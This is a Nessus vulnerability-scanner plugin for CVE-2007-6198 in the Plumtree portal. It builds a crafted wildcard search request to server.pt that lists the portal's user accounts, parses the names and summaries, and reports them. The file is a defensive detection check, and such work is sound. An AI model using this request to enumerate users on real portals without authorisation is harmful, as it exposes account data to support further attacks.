#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains an application affected by an
information disclosure vulnerability. 

Description :

The version of the Plumtree portal included with BEA AquaLogic
Interaction / Plumtree Foundation and installed on the remote host
allows an attacker to obtain a list of users defined to the portal
through its search facility.  This may aide in further attacks against
the affected application. 

See also :

http://procheckup.com/Vulnerability_PR06-11.php
http://dev2dev.bea.com/pub/advisory/254

Solution :

Edit object security and set access privilege to 'None' for Guest or
Everyone user accounts as discussed in the vendor advisory above. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(29187);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2007-6198");
  script_bugtraq_id(26620);

  script_name(english:"Plumtree Portal User Object Information Disclosure Vulnerability");
  script_summary(english:"Searches for Plumtree portal user objects");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);

search = "*";
max_results = 10;


# Loop through directories.
if (thorough_tests) dirs = make_list("/portal", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue.
  req = http_get(
    item:string(
      dir, "/server.pt?",
      "in_ra_groupoperator_1=and&",
      "in_hi_userid=1&",
      "in_hi_req_objtype=1&",          # 1 => Users object type
      "space=SearchResult&",
      "in_tx_fulltext=", search, "&",
      "in_hi_groupoperator_1=and&",
      "parentid=1&",
      "in_hi_req_apps=1&",
      "cached=false&",
      "control=advancedstart&",
      "in_hi_revealed_1=0&",
      "in_hi_req_page=", max_results, "&",
      "in_hi_depth_1=0&",
      "in_hi_totalgroups=1&",
      "parentname=AdvancedSearch&",
      "in_ra_topoperator=and"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we found some users.

  if (
    '="ReorganizeResults"' >< res &&
    '<b>Users</b>' >< res &&
    (
      'One result from your search' >< res ||
      'Results from your search:' >< res
    )
  )
  {
    info = "";
    nusers = 0;

    form = strstr(res, '="ReorganizeResults"') - '="ReorganizeResults"';
    form = form - strstr(form, "</form>");

    pat = '<a href="[^>]+><b>([^<]+)<.+<span[^>]+>(<i>)?([^<]+)';
    matches = egrep(pattern:pat, string:form);
    if (matches)
    {
      foreach match (split(matches))
      {
        match = chomp(match);
        val = eregmatch(pattern:pat, string:match);
        # nb: ignore pseudo-accounts.
        if (!isnull(val) && val[1] !~ "^(Default Profile|Guest|Nobody)$")
        {
          nusers++;

          user = val[1];
          summary = val[3];
          summary = str_replace(find:"&nbsp;", replace:" ", string:summary);

          info += '  - ' + user + '\n' +
                  '    ' + summary + '\n' +
                  '\n';
        }
      }
    }

    if (info)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Here is a list of Plumtree Portal users defined to the remote host and\n",
        "discovered by searching for User objects matching '", search, "' :\n",
        "\n",
        info
      );
      if (nusers >= max_results)
        report = string(
          report,
          "\n",
          "Note that there may actually be more users, but Nessus limited\n",
          "the search to ", max_results, " results.\n"
        );

        security_warning(port:port, data:report);
        exit(0);
    }
  }
}
